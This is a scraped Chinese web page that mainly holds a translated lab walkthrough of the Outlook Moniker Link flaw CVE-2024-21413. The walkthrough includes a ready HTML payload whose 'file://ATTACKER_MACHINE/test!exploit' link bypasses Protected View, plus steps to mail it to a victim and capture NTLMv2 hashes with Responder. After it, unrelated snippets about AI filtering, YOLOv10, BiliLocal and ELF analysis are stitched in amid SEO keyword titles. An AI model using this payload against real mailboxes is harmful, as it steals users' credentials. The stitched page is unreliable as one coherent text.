自动化培训网站建设郑州企业网站优化哪家便宜

张小明 2026/1/11 7:57:43
自动化培训网站建设,郑州企业网站优化哪家便宜,哪些购物网站有做拼团活动,asp网站建设制作Moniker-Link微软威胁分析#xff1a;CVE-2024–21413 作者#xff1a; #$ubhnkr 阅读时间#xff1a; 约3分钟 发布日期#xff1a; 2024年2月23日 简介#xff1a; 各位黑客朋友大家好#xff01;今天我将为大家介绍近期微软Outlook产品的一个漏洞。该漏洞于2024年2月…Moniker-Link微软威胁分析CVE-2024–21413作者#$ubhnkr阅读时间约3分钟发布日期2024年2月23日简介各位黑客朋友大家好今天我将为大家介绍近期微软Outlook产品的一个漏洞。该漏洞于2024年2月13日公布。让我们深入了解其细节以及如何利用它。此漏洞在处理一种特定类型的超链接称为Moniker Link时能够绕过Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞一旦用户点击该超链接Outlook就会将用户的NTLMv2凭据发送给攻击者。漏洞原理展示Outlook可以将电子邮件渲染为HTML。此外Outlook能够解析诸如HTTP和HTTPS之类的超链接。然而它也可以打开指向特定应用程序的URL这些被称为Moniker Links。通常当触发外部应用程序时Outlook会弹出安全警告。如果使用的是skypekeyword那么警告会像这样显示。这个弹窗是Outlook“受保护的视图”功能的结果。如果攻击者创建一个恶意超链接同样会产生安全警报。pahreffile://ATTACKER_MACHINE/testClick me/a/p但是这个警报可以通过使用一个特殊字符来绕过 →!pahreffile://ATTACKER_MACHINE/test!exploitClick me/a/p利用过程要利用此漏洞我们需要创建一个邮件服务器。你可以在TryHackMe实验室中尝试。CMNatic帮助我们创建了一个Python脚本用于通过SMTPServer自动化地向受害者发送邮件。GitHub - CMNatic/CVE-2024-21413: CVE-2024-21413 PoC for THM LabCVE-2024-21413 PoC for THM Lab. 在GitHub上创建账户以贡献CMNatic/CVE-2024-21413的开发。github.com现在运行脚本。注意请在第31行将Attacker_IP和MAILSERVER_IP修改为受害者的IP地址。邮件已送达。现在启动你的Responder来捕获NTLM哈希。打开受害者的Outlook收件箱。你可以看到邮件已经送达。现在如果你点击“Click me”由于那个特殊字符!的存在将不会弹出安全警报。否则它会显示警报。如果你点击了该链接你将会获得受害者的NTLM哈希。总结以上就是该漏洞的利用方式。感谢阅读如果你喜欢这篇文章别忘了点赞并关注我以获取更多文章。祝黑客之旅愉快~CSD0tFqvECLokhw9aBeRqteIgvZsxhm14qXjGWMVhkLQKZqtp5udwihyDPFTm5IRv37dlo2W4VY3z1d0M7aWubJiUxybkI3nx55gCmDWobsitrjS0yiQJF3ZKoUJ66E更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

商城网站要怎样建设什么网站建设比较好的

第一章:揭秘Open-AutoGLM内容过滤机制的核心原理Open-AutoGLM 作为新一代生成式语言模型,其内容过滤机制在保障输出安全性和合规性方面发挥着关键作用。该机制并非依赖简单的关键词匹配,而是基于多层深度学习模型与规则引擎协同工作的复合架构…

张小明 2026/1/10 6:26:22 网站建设

丘北网站建设做淘宝代码的网站

YOLOv10 iOS部署终极指南:5大关键技术实现3倍性能提升 【免费下载链接】ultralytics ultralytics - 提供 YOLOv8 模型,用于目标检测、图像分割、姿态估计和图像分类,适合机器学习和计算机视觉领域的开发者。 项目地址: https://gitcode.com…

张小明 2026/1/10 7:26:00 网站建设

大学生网站开发现在做个人网站

Langchain-Chatchat:构建安全可控的备份数据保护知识库 在企业IT运维中,一个常见的场景是:某位新入职的系统管理员发现上周的数据库备份任务失败了,他急切地想知道该怎么做。过去,他可能需要翻遍共享盘里的《灾备SOP》…

张小明 2026/1/10 6:26:23 网站建设

.net 导航网站模板开发工具箱

BiliLocal弹幕播放器:让你的本地视频秒变B站互动体验 【免费下载链接】BiliLocal add danmaku to local videos 项目地址: https://gitcode.com/gh_mirrors/bi/BiliLocal 你是否曾经观看本地视频时,总觉得少了点什么?那种弹幕飞过屏幕…

张小明 2026/1/10 6:26:23 网站建设

优秀个人博客网站分宜网站建设

Linux 恶意 ELF 文件分析全攻略 1. 嵌入式工件提取再探 在成功执行恶意代码样本、进行进程内存轨迹分析或从物理内存中提取可执行文件后,需要重新检查样本以查找嵌入式工件。重新审视未混淆的程序,查看字符串、符号信息、文件元数据和 ELF 结构细节。通过比较文件执行前后的…

张小明 2026/1/10 7:08:29 网站建设

黑龙江生产建设兵团网站上海最好的网吧

你是否厌倦了Windows 11任务栏的固定布局?想要让桌面真正属于自己吗?Taskbar11这款轻量级工具正是为你量身打造的桌面个性化利器。通过简单的设置调整,你就能彻底改变任务栏的外观和行为,让工作环境更符合你的使用习惯。 【免费下…

张小明 2026/1/10 6:26:34 网站建设